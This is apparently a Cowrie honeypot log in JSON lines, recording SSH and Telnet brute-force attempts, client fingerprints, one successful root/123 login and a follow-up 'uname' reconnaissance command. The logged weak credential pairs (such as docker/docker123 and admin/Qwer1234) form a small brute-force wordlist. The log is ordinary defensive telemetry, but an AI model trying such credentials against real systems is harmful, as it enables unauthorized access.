{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:38:54.739534Z","src_ip":"212.227.235.229","session":"a57f0a20bf2a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:38:54.740188Z","src_ip":"212.227.235.229","session":"a57f0a20bf2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43022,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf500ab379af","protocol":"ssh","message":"New connection: 212.227.125.160:43022 (1.2.3.4:22) [session: cf500ab379af]","sensor":"my-vps","timestamp":"2025-08-31T05:38:58.824151Z"}
{"eventid":"cowrie.login.failed","username":"test1","password":"P@ssw0rd123","message":"login attempt [test1/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:39:00.380077Z","src_ip":"212.227.235.229","session":"a57f0a20bf2a"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:39:02.251445Z","src_ip":"212.227.235.229","session":"a57f0a20bf2a"}
{"eventid":"cowrie.session.connect","src_ip":"83.11.39.65","src_port":49690,"dst_ip":"1.2.3.4","dst_port":23,"session":"21bb18071ab0","protocol":"telnet","message":"New connection: 83.11.39.65:49690 (1.2.3.4:23) [session: 21bb18071ab0]","sensor":"my-vps","timestamp":"2025-08-31T05:39:02.711841Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:39:09.310583Z","src_ip":"212.227.125.160","session":"cf500ab379af"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:39:09.311732Z","src_ip":"212.227.125.160","session":"cf500ab379af"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:39:11.648014Z","src_ip":"58.144.199.22","session":"3531dfd8e637"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42766,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c6c3d242608","protocol":"ssh","message":"New connection: 212.227.125.160:42766 (1.2.3.4:22) [session: 5c6c3d242608]","sensor":"my-vps","timestamp":"2025-08-31T05:39:15.174844Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:39:15.856318Z","src_ip":"212.227.125.160","session":"5c6c3d242608"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:39:15.857362Z","src_ip":"212.227.125.160","session":"5c6c3d242608"}
{"eventid":"cowrie.login.failed","username":"test1","password":"P@ssw0rd123","message":"login attempt [test1/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:39:17.652436Z","src_ip":"212.227.125.160","session":"5c6c3d242608"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:39:19.086811Z","src_ip":"212.227.125.160","session":"5c6c3d242608"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker123","message":"login attempt [docker/docker123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:39:24.672386Z","src_ip":"212.227.125.160","session":"cf500ab379af"}
{"eventid":"cowrie.session.closed","duration":"27.7","message":"Connection lost after 27.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:39:26.555748Z","src_ip":"212.227.125.160","session":"cf500ab379af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36410,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac30a3c331f9","protocol":"ssh","message":"New connection: 212.227.235.229:36410 (1.2.3.4:22) [session: ac30a3c331f9]","sensor":"my-vps","timestamp":"2025-08-31T05:39:32.130278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:39:34.356880Z","src_ip":"212.227.235.229","session":"ac30a3c331f9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:39:34.357646Z","src_ip":"212.227.235.229","session":"ac30a3c331f9"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker123","message":"login attempt [docker/docker123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:39:41.442740Z","src_ip":"212.227.235.229","session":"ac30a3c331f9"}
{"eventid":"cowrie.session.closed","duration":39.88684558868408,"message":"Connection lost after 39 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:39:42.598594Z","src_ip":"83.11.39.65","session":"21bb18071ab0"}
{"eventid":"cowrie.session.closed","duration":"11.1","message":"Connection lost after 11.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:39:43.225981Z","src_ip":"212.227.235.229","session":"ac30a3c331f9"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":38498,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2823e83876d","protocol":"ssh","message":"New connection: 43.159.36.188:38498 (1.2.3.4:22) [session: f2823e83876d]","sensor":"my-vps","timestamp":"2025-08-31T05:39:45.043074Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:39:45.044123Z","src_ip":"43.159.36.188","session":"f2823e83876d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:39:45.290006Z","src_ip":"43.159.36.188","session":"f2823e83876d"}
{"eventid":"cowrie.login.failed","username":"albert","password":"1234","message":"login attempt [albert/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T05:39:46.313806Z","src_ip":"43.159.36.188","session":"f2823e83876d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:39:47.562838Z","src_ip":"43.159.36.188","session":"f2823e83876d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59244,"dst_ip":"1.2.3.4","dst_port":22,"session":"839ee159aac9","protocol":"ssh","message":"New connection: 212.227.235.229:59244 (1.2.3.4:22) [session: 839ee159aac9]","sensor":"my-vps","timestamp":"2025-08-31T05:39:52.675190Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46600,"dst_ip":"1.2.3.4","dst_port":22,"session":"917a93a02abb","protocol":"ssh","message":"New connection: 212.227.125.160:46600 (1.2.3.4:22) [session: 917a93a02abb]","sensor":"my-vps","timestamp":"2025-08-31T05:39:53.490246Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:39:53.879214Z","src_ip":"212.227.235.229","session":"839ee159aac9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:39:53.880023Z","src_ip":"212.227.235.229","session":"839ee159aac9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55554,"dst_ip":"1.2.3.4","dst_port":22,"session":"8abc42e344cf","protocol":"ssh","message":"New connection: 212.227.235.229:55554 (1.2.3.4:22) [session: 8abc42e344cf]","sensor":"my-vps","timestamp":"2025-08-31T05:39:54.423205Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:39:54.424157Z","src_ip":"212.227.235.229","session":"8abc42e344cf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:39:54.696930Z","src_ip":"212.227.235.229","session":"8abc42e344cf"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":46582,"dst_ip":"1.2.3.4","dst_port":22,"session":"48a62186f7b6","protocol":"ssh","message":"New connection: 170.64.166.123:46582 (1.2.3.4:22) [session: 48a62186f7b6]","sensor":"my-vps","timestamp":"2025-08-31T05:39:55.647229Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:39:55.648129Z","src_ip":"170.64.166.123","session":"48a62186f7b6"}
{"eventid":"cowrie.login.failed","username":"noc","password":"P@ssw0rd","message":"login attempt [noc/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-31T05:39:55.830317Z","src_ip":"212.227.235.229","session":"8abc42e344cf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:39:55.923331Z","src_ip":"170.64.166.123","session":"48a62186f7b6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:39:56.039660Z","src_ip":"212.227.125.160","session":"917a93a02abb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:39:56.072341Z","src_ip":"212.227.125.160","session":"917a93a02abb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Qwer1234","message":"login attempt [admin/Qwer1234] failed","sensor":"my-vps","timestamp":"2025-08-31T05:39:57.067068Z","src_ip":"170.64.166.123","session":"48a62186f7b6"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:39:57.105685Z","src_ip":"212.227.235.229","session":"8abc42e344cf"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:39:58.344801Z","src_ip":"170.64.166.123","session":"48a62186f7b6"}
{"eventid":"cowrie.login.failed","username":"test1","password":"letmein","message":"login attempt [test1/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T05:39:59.379405Z","src_ip":"212.227.235.229","session":"839ee159aac9"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:40:01.093729Z","src_ip":"212.227.235.229","session":"839ee159aac9"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:40:06.794790Z","src_ip":"212.227.125.160","session":"917a93a02abb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51566,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cca7bc7a908","protocol":"ssh","message":"New connection: 212.227.235.229:51566 (1.2.3.4:22) [session: 1cca7bc7a908]","sensor":"my-vps","timestamp":"2025-08-31T05:40:07.866775Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:40:11.042135Z","src_ip":"212.227.235.229","session":"1cca7bc7a908"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:40:11.057633Z","src_ip":"212.227.235.229","session":"1cca7bc7a908"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:40:11.995698Z","src_ip":"212.227.125.160","session":"917a93a02abb"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T05:40:11.996538Z","src_ip":"212.227.125.160","session":"917a93a02abb"}
